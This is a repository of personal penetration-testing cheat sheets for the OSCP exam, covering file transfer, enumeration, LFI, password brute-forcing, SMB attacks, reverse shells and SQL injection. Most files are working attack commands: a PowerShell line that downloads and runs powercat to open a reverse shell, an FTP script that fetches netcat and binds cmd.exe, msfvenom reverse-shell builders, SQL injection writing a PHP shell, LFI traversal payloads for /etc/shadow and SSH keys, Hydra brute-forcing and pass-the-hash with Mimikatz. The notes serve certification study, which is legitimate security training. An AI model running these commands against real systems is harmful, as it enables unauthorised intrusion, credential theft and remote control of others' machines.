[ { "path": "File_Transfer", "content": "#With Curl\ncurl http://XX.XX.XX.XX/test.sh --output test.sh\n------------------------\n#Paste the following code to get nc in the victim:\necho open 21> ftp.txt\necho USER offsec>> ftp.txt\necho ftp>> ftp.txt\necho bin >> ftp.txt\necho GET nc.exe >> ftp.txt\necho bye >> ftp.txt\nftp -v -n -s:ftp.txt\nnc.exe 1234 -e cmd.exe\n------------------------\n#Bounce port sanning\n$ nc $ip 21\n220 Femitter FTP Server ready.\nUSER anonymous\n331 Password required for anonymous.\nPASS foo\n230 User anonymous logged in.\nPORT 127,0,0,1,0,80\n200 Port command successful.\nLIST\n------------------------\n#Nice trick to share folders with RDP:\n$ rdesktop (ip) -r disk:share=/home/bayo/store\n------------------------\n#With powershell:\n$ powershell -c \"(new-object System.Net.WebClient).DownloadFile('http://YOURIP:8000/b.exe','C:\\Users\\YOURUSER\\Desktop\\b.exe')\"\n------------------------\n#Paste the following block in a command line to get a web client:\necho strUrl = WScript.Arguments.Item(0) > wget.vbs\necho StrFile = WScript.Arguments.Item(1) >> wget.vbs\necho Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs\necho Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs\necho Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs\necho Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs\necho Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs\necho Err.Clear >> wget.vbs\necho Set http = Nothing >> wget.vbs\necho Set http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> wget.vbs\necho If http Is Nothing Then Set http = CreateObject(\"WinHttp.WinHttpRequest\") >> wget.vbs\necho If http Is Nothing Then Set http = CreateObject(\"MSXML2.ServerXMLHTTP\") >> wget.vbs\necho If http Is Nothing Then Set http = CreateObject(\"Microsoft.XMLHTTP\") >> wget.vbs\necho http.Open \"GET\",strURL,False >> wget.vbs\necho http.Send >> wget.vbs\necho varByteArray = http.ResponseBody >> wget.vbs\necho Set http = Nothing >> wget.vbs\necho Set fs = CreateObject(\"Scripting.FileSystemObject\") >> wget.vbs\necho Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs\necho strData = \"\" >> wget.vbs\necho strBuffer = \"\" >> wget.vbs\necho For lngCounter = 0 to UBound(varByteArray) >> wget.vbs\necho ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs\necho Next >> wget.vbs\necho ts.Close >> wget.vbs\nRun with:\n$ cscript wget.vbs http:///nc.exe nc.exe\n" }, { "path": "Index_Detection", "content": "#GOBUSTER\n• gobuster dir -u http://XX.XX.XX.XX/Customer/Info -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k\n------------------------\n#with ssl GOBUSTER\n• gobuster dir -u http://XX.XX.XX.XX -w /usr/share/wordlists/dirbuster -k \n------------------------\n#DiRB\n• dirb url -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n------------------------\n#Davtest\n• davtest -url http://XX.XX.XX.XX\n------------------------\n#WPScan\n• wpscan -u https://omurugur.com/ --disable-tls-checks --enumerate p -- emumerate t --enumerate -u\n• wpscan --url https://omurugur.com/ --disable-tls-checks --api-tkoen \n• wpscan --url https://omurugur.com/ -e ap \n" }, { "path": "LFI", "content": "#Useful LFI files (nulbyte)\n../../../../../etc/passwd%00\n....//....//....//....//....//etc/passwd%00\n..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd\n------------------------\n#Linux:\n/etc/passwd\n/etc/shadow\n/etc/issue\n/etc/group\n/etc/hostname\n/etc/ssh/ssh_config\n/etc/ssh/sshd_config\n/root/.ssh/id_rsa\n/root/.ssh/authorized_keys\n/home/user/.ssh/authorized_keys\n/home/user/.ssh/id_rsa\n------------------------\n#Apache:\nConfiguration Files:\n/etc/apache2/apache2.conf\n/usr/local/etc/apache2/httpd.conf\n/etc/httpd/conf/httpd.conf\n------------------------\n#Log Files:\nRed Hat/CentOS/Fedora Linux-   /var/log/httpd/access_log\nDebian/Ubuntu-   /var/log/apache2/access.log\nFreeBSD-   /var/log/httpd-access.log\n------------------------\n#Generic:\n/var/log/apache/access.log\n/var/log/apache/error.log\n/var/log/apache2/access.log\n/var/log/apache/error.log\n------------------------\n#MySql:\n/var/lib/mysql/mysql/user.frm\n/var/lib/mysql/mysql/user.MYD\n/var/lib/mysql/mysql/user.MYI\n------------------------\n#Windows:\n/boot.ini\n/autoexec.bat\n/windows/system32/drivers/etc/hosts\n/windows/repair/SAM\n/windows/panther/unattended.xml\n/windows/panther/unattend/unattended.xml\n------------------------\n" }, { "path": "LICENSE", "content": "MIT License\n\nCopyright (c) 2021 Ömür Uğur\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "Password_Attack", "content": "#SSH Attack with THC-Hydra\n• hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1\n------------------------\n#Remote Desktop Protocol Attack with Crowbar\n• crowbar -b rdp -s XX.XX.XX.XX/32 -u admin -C ~/password-file.txt -n 1\n------------------------\n#HTTP htaccess Attack with Medusa\n• medusa -h XX.XX.XX.XX -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin\n------------------------\n#HTTP POST Attack with THC-Hydra\n• hydra XX.XX.XX.XX http-form-post \"/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN\" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f\n" }, { "path": "Port_Scan", "content": "#Nmap\n• nmap -sC -sV -O -iP\n• nmap -p- --min-rate 10000 -oA scans/alltcp XX.XX.XX.XX\n• nmap -p- -v \n• nmap -sT -sV -p- XX.XX.XX.XX -oA XX.XX.XX.XX\n------------------------\n#TCP Top 1000\n• nmap -Pn -sC -sV -oA tcp -vv $ip\n------------------------\n#All TCP Ports:\n• nmap -Pn -sC -sV -oA all -vv -p- $ip\n------------------------\n#UDP Top 100:\n• nmap -Pn -sU --top-ports 100 -oA udp -vv $ip\n• unicornscan -mU -v -I XX.XX.XX.XX\n------------------------\n#No Ping \n• nmap -sV -sC -O -Pn XX.XX.XX.XX\n------------------------\n#All Port \n• nmap -sV -sC -O -Pn -p 1-65535 XX.XX.XX.XX\n------------------------\n#Nmap Detect And Write Stand-up Servers\n• nmap -v -sn XX.XX.XX.XX-254 -oG upHost.txt \n------------------------\n#UDP Scan\n• nmap --top-ports 200 -sU -A XX.XX.XX.XX\n------------------------\n#With Netcat\n• nc -nvv -w 1 -z XX.XX.XX.XX 3388-3390\n" }, { "path": "Port_Scan_By_Ports", "content": "#SSH\n• nmap -sV --script=ssh-* -p 22 XX.XX.XX.XX\n------------------------\n#SNMP\n• sudo nmap -sU --open -p 161 XX.XX.XX.XX-254 -oG open-snmp.txt\n• snmpwalk -c public -v1 -t 10 XX.XX.XX.XX\n• snmp-check -t $ip -c public\n• nmap -sU -p161 --script \"snmp-*\" $ip\n------------------------\n#Enumerating Windows Users\n• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.4.1.77.1.2.25\n------------------------\n#Enumerating Running Windows Processes\n• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.25.4.2.1.2\n------------------------\n#Enumerating Open TCP Ports\n• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.6.13.1.3\n------------------------\n#Enumerating Installed Software\n• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.25.6.3.1.2\n------------------------\n#SMTP\n#telnet or netcat connection\n• nc 25\n• VRFY root\n------------------------\n#Check for commands\n• nmap -script smtp-commands.nse \n• nmap XX.XX.XX.XX -p 25 --script=smtp-*\n• nc -nv XX.XX.XX.XX 25\n------------------------\nCommand to check if a user exists\nVRFY root\nCommand to ask the server if a user belongs to a mailing list\nEXPN root\n------------------------\n#Always do users enumeration\n• smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip\n• smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t $ip\n------------------------\n#SMB\n------------------------\n#Enumerate Hostname - nmblookup -A $ip\n• List Shares\n• smbmap -H $ip\n• echo exit | smbclient -L \\\\\\\\$ip\n• nmap --script smb-enum-shares -p 139,445 $ip\n• smbclient -N -L //XX.XX.XX.XX\n------------------------\n#Check Null Sessions\n• smbmap -H $ip\n• rpcclient -U \"\" -N $ip\n• smbclient -N -L \\\\\\\\XX.XX.XX.XX\\\\\n• smbclient \\\\\\\\$ip\\\\[share name]\n• smbclient -L XX.XX.XX.XX--option='client min protocol=NT1'\n• smbclient -L //XX.XX.XX.XX/ --option='client min protocol=NT1'\n• smbclient \\\\\\\\XX.XX.XX.XX\\\\'bob share' --option='client min protocol=NT1'\n------------------------\n#Check for Vulnerabilities - \nnmap --script smb-vuln* -p 139,445 $ip\n------------------------\n#Overall Scan - \nenum4linux -a $ip\n------------------------\n#Manual Inspection\n• smbver.sh $ip (port)\n------------------------\n#rpcclient\n• rpcclient -U '' $ip\n• Password:\n• rpcclient $> srvinfo # operating system version\n• rpcclient $> netshareenumall # enumerate all shares and its paths\n• rpcclient $> enumdomusers # enumerate usernames defined on the server\n• rpcclient $> getdompwinfo # smb password policy configured on the server\n------------------------\n#CrackMapExe\n• crackmapexec -u 'guest' -p '' --shares $ip\n• crackmapexec -u 'guest' -p '' --rid-brute 4000 $ip\n• crackmapexec -u 'guest' -p '' --users $ip\n• crackmapexec smb XX.XX.XX.XX/24 -u Administrator -p P@ssw0rd\n• crackmapexec smb XX.XX.XX.XX/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B\n• crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz XX.XX.XX.XX/24\n• crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip\n• crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip# reliable pth code execution\n------------------------\n#smbmap\n• smbmap -u '' -p '' -H $ip # similar to crackmapexec --shares\n• smbmap -u guest -p '' -H $ip\n• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip\n• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dir\n• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursively\n• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work\n• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # no work\n------------------------\n# Share List:\n• smbclient --list \n• smbclient -L \n• smbclient -L //XX.XX.XX.XX\n------------------------\n# SMB Client:\n• smbclient //XX.XX.XX.XX/pathname\n• smbclient -L //XX.XX.XX.XX\n------------------------\n# SMB Map:\n• smbmap -H XX.XX.XX.XX\n• smbmap -H XX.XX.XX.XX -R --depth 5\n• smbmap -H htb.local -u -p \n------------------------\n# Check SMB vulnerabilities:\n• nmap --script=smb-check-vulns.nse -p445\n• nmap --script vuln XX.XX.XX.XX -p445\n• nmap --script \"vuln\" -p139,445\n------------------------\n# basic nmap scripts to enumerate shares and OS discovery\n• nmap -p 139,445 XX.XX.XX.XX/24 --script smb-enum-shares.nse smb-os-discovery.nse\n• nmap --script smb-enum-shares.nse -p445 XX.XX.XX.XX\n------------------------\n# Connect using Username\n• smbclient -L -U username -p 445\n------------------------\n# Connect to Shares\n• smbclient \\\\\\\\\\\\ShareName\n• smbclient \\\\\\\\\\\\ShareName -U User_name\n------------------------\n# enumarete with smb-shares, -a “do everything” option\n• enum4linux -a XX.XX.XX.XX\n• enum4linux -i XX.XX.XX.XX\n------------------------\n# learn the machine name and then enumerate with smbclient\n• nmblookup -A XX.XX.XX.XX\n• smbclient -L -I XX.XX.XX.XX\n------------------------\n# DNS ENUM\n• dnsenum zonetransfer.me\n------------------------\n# DNS RECON\n• dnsrecon -d okmurugur.com -t axfr\n• dnsrecon -d XX.XX.XX.XX -r XX.XX.XX.XX/8\n------------------------\n# DNS ENUMERATiON\n• host www.okmurugur.com\n• host -t mx okmurugur.com\n• host -t txt okmurugur.com\n------------------------\n# DiG\n• dig axfr @XX.XX.XX.XX okmurugur.com\n" }, { "path": "README.md", "content": "
\n

OSCP ( Offensive Security Certified Professional )

\n

\n \n\n\n\n

\n \n \n \"Donate\n \nOverview:\n\nPenetration Testing with Kali Linux (PEN-200) is the foundational course at Offensive Security. Those new to OffSec or penetration testing should start here.\n\nThis online ethical hacking course is self-paced. It introduces penetration testing tools and techniques via hands-on experience. PEN-200 trains not only the skills, but also the mindset required to be a successful penetration tester. Students who complete the course and pass the exam earn the coveted Offensive Security Certified Professional (OSCP) certification.\n\nTo learn more about the modules updated in 2020 and get answers to frequently asked questions, see the announcement blog post.\n \n \n\n\nYou can find my experience on the OSCP certification exam that I entered in 2021 and succeeded on my site. I wish success to the friends who will take the exam.\n\n\n

References

\n\n•\thttps://www.offensive-security.com/pwk-oscp/\n

\n\n\n

Download

\n\n
Cloning an Existing Repository ( Clone with HTTPS )
\n
\nroot@slife:~# git clone https://github.com/omurugur/OSCP.git\n
\n
Cloning an Existing Repository ( Clone with SSH )
\n
\nroot@slife:~# git clone git@github.com:omurugur/OSCP.git\n
\n\n\n

Contact

\n\n
Mail : omurugur12@gmail.com
\n\n
Linkedin : https://www.linkedin.com/in/omurugur-sibergüvenlik/
\n\n
GitHub : https://github.com/omurugur
\n\n
Twitter : https://twitter.com/omurugurrr
\n\n
Medium : https://omurugur.medium.com/
\n\n
Donate!
\n

\nSupport the authors:\n\n\n\n" }, { "path": "Reverse_Shell", "content": "# Interactive TTY Shell\n• python -c 'import pty; pty.spawn(\"/bin/sh\")'\n• python -c 'import pty;pty.spawn(\"/bin/bash\")'\n• python -c 'import pty; pty.spawn(\"/bin/bash\")'\n• /usr/bin/script -qc /bin/bash /dev/null\n------------------------\n# With Powershell \n• powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://XX.XX.XX.XX/powercat.ps1');powercat -c XX.XX.XX.XX -p 9090 -e cmd\"\n------------------------\n# Reverse Shell \n#Linux\n•msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -f elf > shell.elf\n# PHP\n•msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=443 -f raw > shell.php\n# ASP\n•msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.216 LPORT=443 -f asp > shell.asp\n# WAR\n•msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f war > shell.war\n# JSP\n•msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f raw > shell.jsp\n# Exe\n•msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=445 -f exe -o shell_reverse.exe\n# ASPX\n•msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f aspx > shell.aspx\n# ASPX-x64 \n•msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=1234 -f aspx > 4.aspx\n------------------------\n#Shell From SQL Injection\n•windows\n?id=1 union all select 1,2,3,4,\"\",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'\n•linux\n?id=1 union all select 1,2,3,4,\"\",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'\n" }, { "path": "Road_Map", "content": "\nNetwork Scanning\n\nService Scanning\n\n WebApp\n ☐ Nikto \n ☐ dirb\n ☐ dirbuster\n ☐ wpscan\n ☐ dotdotpwn\n ☐ view source \n ☐ davtest\\cadevar\n ☐ droopscan\n ☐ joomscan\n ☐ LFI\\RFI Test\n ☐ SQL ınjectıon\n ☐ Default şifre arama \n \n Linux\\Windows\n ☒ snmpwalk -c public -v1 ipaddress 1\n ☐ smbclient -L //ipaddress\n ☐ showmount -e ipaddress port\n ☐ rpcinfo\n ☐ Enum4Linux\n \n Anything Else\n ☐ nmap scripts (locate *nse* | grep servicename)\n ☐ hydra\n ☐ MSF Aux Modules\n ☐ Download the software\n\nExploitation\n ☐ Gather Version Numbes\n ☐ Searchsploit\n ☐ Default Creds\n ☐ Creds Previously Gathered\n ☐ Download the software\n\nPost Exploitation\n\n Linux\n ☐ linux-local-enum.sh\n ☐ linuxprivchecker.py\n ☐ linux-exploit-suggestor.sh\n ☐ unix-privesc-check.py\n\n Windows\n ☐ wpc.exe\n ☐ windows-exploit-suggestor.py\n ☐ windows_privesc_check.py\n ☐ windows-privesc-check2.exe\n\nPriv Escalation\n ☐ acesss internal services (portfwd)\n ☐ add account\n\nWindows\n ☐ List of exploits\n\nLinux\n ☐ sudo su \n ☐ KernelDB\n ☐ Searchsploit\n\nFinal\n ☐ Screenshot of IPConfig\\WhoamI\n ☐ Copy proof.txt\n ☐ Dump hashes \n ☐ Dump SSH Keys\n ☐ Delete files\n" }, { "path": "SQLi", "content": "#sqlmap\n☐ sqlmap -r name.txt --batch --force-ssl\n☐ sqlmap -r name.txt --dbms mysql --technique=U --dump --batch\n☐ sqlmap -r name.txt --dbms mysql --technique=U --users\n☐ sqlmap -r name.txt --dbms mysql --technique=U --passwords\n☐ sqlmap -u http://XX.XX.XX.XX/tst.php?id=1 -p \"id\" --dbms=mysql --dump\n☐ sqlmap -u http://XX.XX.XX.XX/tst.php?id=1 -p \"id\" --dbms=mysql --os shel\n------------------------\n\n" }, { "path": "Useful_Resources", "content": "Blog :\nMy experience with the OSCP certification — Security Café\nPWK and OSCP my experience | Fady Osman’s Technical Blog\nOffensive Security’s PWB and OSCP — My Experience — Security SiftSecurity Sift\nPenetration Testing With Backtrack — OSCP — Things all the hacking\nPentesting With BackTrack (PWB) + Offensive Security Certified Professional (OSCP)\nOSCP Course and Exam Review — RCE Security\nTry Harder! An OSCP Review.Blog of Jason Bernier\nPentest Tips and Tricks — EK\nOpen Security Research: Using Mimikatz to Dump Passwords!\nHacking/OSCP cheatsheet :: Ceso Adventures\nThe CORE Hacking Course — YouTube\nEğlence ve Kâr için bir web.config Dosyası Yükleme | Soroush Dalili (@irsdl) — سروش دلیلی\nNetSecFocus Trophy Room — Google Drive\nEnumeration :\noscp/linux-template.md at master · xapax/oscp\noscp/windows-template.md at master · xapax/oscp\nCTF Series : Vulnerable Machines — tech.bitvijays.com\nPWK Notes: SMB Enumeration Checklist [Updated] | 0xdf hacks stuff\nnmapAutomator/nmapAutomator.sh at master · 21y4d/nmapAutomator\nPrivilege_Escalation_Windows:\nWindows Privilege Escalation Guide\nFuzzySecurity | Windows Privilege Escalation Fundamentals\nWindows elevation of privileges\n(1) Windows Privilege Escalation — AlwaysInstallElevated — YouTube\nPowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploit\nWindowsEnum/WindowsEnum.ps1 at master · absolomb/WindowsEnum\nWindows-Exploit-Suggester/windows-exploit-suggester.py at master · AonCyberLabs/Windows-Exploit-Suggester\nWindows Privilege Escalation Methods for Pentesters — Pentest Blog\nFuzzySecurity | Windows Privilege Escalation Fundamentals\nWindows Local Privilege Escalation — HackTricks\nGhostPack/SharpUp: SharpUp is a C# port of various PowerUp functionality.\nGhostpack-CompiledBinaries/SharpUp.exe at master · r3motecontrol/Ghostpack-CompiledBinaries\nhttps://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1\nGhostPack/Seatbelt: Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.\nGhostpack-CompiledBinaries/Seatbelt.exe at master · r3motecontrol/Ghostpack-CompiledBinaries\nprivilege-escalation-awesome-scripts-suite/winPEAS at master · carlospolop/privilege-escalation-awesome-scripts-suite\nbitsadmin/wesng: Windows Exploit Suggester — Next Generation\nrasta-mouse/Watson: Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities\nSecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合\nNeohapsis/creddump7\njuicy-potato/README.md at master · ohpe/juicy-potato\nantonioCoco/RoguePotato: Another Windows Local Privilege Escalation from Service Account to System\nitm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019\nPrivilege_Escalation_Linux:\nsagishahar/lpeworkshop: Windows / Linux Local Privilege Escalation Workshop\nLinux elevation of privileges\nLinEnum/LinEnum.sh at master · rebootuser/LinEnum\nBasic Linux Privilege Escalation\nLinux Privilege Escalation Scripts\nLinux Privilege Escalation — HackTricks\ndiego-treitos/linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels\nCronjobs’u Kullanarak Linux Ayrıcalık Yükselmesi\nrebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks\nlinted/linuxprivchecker: linuxprivchecker.py — a Linux Privilege Escalation Check Script\nAlessandroZ/BeRoot: Privilege Escalation Project — Windows / Linux / Mac\nunix-privesc-check | pentestmonkey\njondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester\nLinux Sızma Testlerinde Hak Yükseltme Yöntemleri | SİBER GÜVENLİK PORTALİ\nReverse_Shell:\nreverseshell | pentestmonkey\nnetcat 1.11 for Win32/Win64\nUpgrading Simple Shells to Fully Interactive TTYs — ropnop blog\nSpawning a TTY Shell\nReverse Shell Cheat Sheet | pentestmonkey\nReverse Shell Cheat Sheet\nRemote-File-Inclusion-Shell/knock.txt at master · namansahore/Remote-File-Inclusion-Shell\nBOF:\nPWK/OSCP — Stack Buffer Overflow Practice — vortex’s blog\nSeattle Lab Mail (SLmail) 5.5 Üzerinde Stack Tabanlı Bellek Taşma Zafiyetinin İstismarı | SİBER GÜVENLİK PORTALİ\n(1) Buffer Overflow Exploitation (Minishare & FreeFloat) — YouTube\njustinsteven/dostackbufferoverflowgood\njessekurrus/slmailsploits: Several Python scripts used to fuzz and exploit SLmail. These are meant to supplement the Kali Linux Hands-on Pentesting Udemy course.\n(2) Immunity Debugger Overview — YouTube\nStack Based Buffer Overflow in Win 32 Platform: The Basics\nStack Buffer Overflow Zafiyeti — PCMan FTP Server 2.0.7 | Ahmet GÜREL\nZero Day Zen Garden: Windows Exploit Development — Part 5 [Return Oriented Programming Chains]\nZero Day Zen Garden: Windows Exploit Development — Part 4 [Overwriting SEH with Buffer Overflows]\nBuffer Overflow — Easy Chat Server 3.1 — OnSecurity\nBuffer Overflow Exploit Geliştirme ~ BTRiskBlog Pentest, ISO27001 ve BT Denetimi Hakkında Herşey\nCoalfire — The Basics of Exploit Development 1: Win32 Buffer Overflows\nCoalfire — Coalfire Blog\nCoalfire — Coalfire Blog\nCustomized Mail Server Software Buffer Overflow on Windows Server 2008 | by Rudy Samuel Pardosi | Medium\nVulnserver Kullanarak Basit Bir Arabellek Taşması | Z3R0th tarafından | Orta\nBağışıklık Hata Ayıklayıcısı ve Mona.py ile Kötü Karakterler Bulma — Bulb Security\nminishare 1.4.1 exploit — YouTube\nSQLI:\nSQL-Injections · Security — My notepad\n44348-error-based-sql-injection-in-order-by-clause-(mssql).pdf\nFull MSSQL Injection PWNage\nMSSQL Practical Injection Cheat Sheet — Perspective Risk\nSQL Injection Cheat Sheet | Netsparker\nÖner KAYA: Gelişmiş SQL Enjeksiyon İşlemleri (Advanced Sql Injection)\nRed Team Tales 0x01: From MSSQL to RCE — Tarlogic Security — Cyber Security and Ethical hacking\nSQL Injection Cheat Sheet | Bhanu Notes\nSQL-Injections · Total OSCP Guide\nSQL Tutorial\nLFI:\nHack The Box — Poison Writeup w/o Metasploit | by Rana Khalil | The Startup | Medium\n(7) HackTheBox — Poison — YouTube\n" } ]